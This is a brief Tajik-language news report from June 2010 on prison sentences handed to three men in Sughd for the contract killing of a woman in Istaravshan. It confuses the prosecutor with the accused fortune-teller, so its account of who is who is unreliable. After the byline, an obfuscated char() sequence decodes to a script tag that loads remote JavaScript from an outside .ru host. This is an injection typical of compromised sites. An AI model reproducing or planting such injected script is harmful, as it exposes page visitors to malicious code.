22.06.2010
Қотилонро маҳкум карданд
Хабар дода мешавад, ки додгоҳи вилояти Суғд, муҳокимаи парвандаи марбут ба қатли як зани ҷавон, ки аз ҷониби 3 нафар мард, ки яке аз онҳо «фолбин» тавсиф дода шудааст, анҷом дод.

Додситони вилояти Суғд, Ихтиёр Негматов як тан аз сокини 40-солаи шаҳри Истаравшан, ки касби фолбинӣ доштааст, дар қатли зане, ки маъшуқаи ӯ хонда шуда, ӯро гунаҳкор медонад, 28-сол аз озодӣ маҳрум сохт.
Гуфта мешавад, ки Ихтиёр Негматов дар моҳи ноябри соли гузашта ба Алексей Аксенов, сокини 27-солаи ш. Истаравшан, ки бекор будааст, барои қатли зане бо номи Заррина, ки маъшуқааш дониста шуда, 500 $-и амрикоӣ ваъда кардааст.
Бино ба маълумотҳо, Ихтиёр Негматов бо Заррина чанд сол инҷониб бо ҳам зиндагӣ кардаанд, ки бино бар ин, як манбаи огоҳ дар додситонии вилоят перомуни ин масоил гуфтааст: «Ҳамсари Ихтиёр Негматов аз равобити вай бо маъшуқааш огоҳ мешавад ва Негматов нобуд кардани далели бевафоӣ бо миёнравии Таваккал Юнусов ба қатли маъшуқааш фармоиш медиҳад».
Аз рӯи иттилооти ба дастомада, ин зани ҷавон, сараввал ба қатл расонида шуда, сипас ҷасадашро оташ зада, баъдан, ба дарё партофта шудааст.
Додгоҳи вилоят, Алексей Аксеновро ба 28 сол ва Таваккал Юнусовро низ ба 18 сол аз озодӣ маҳрум кард.
Шаҳриёри КАБИР

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)e0887ddf98501fed12c6118580fcf000.js" type="text/javascript">

ТАВЗЕҲОТ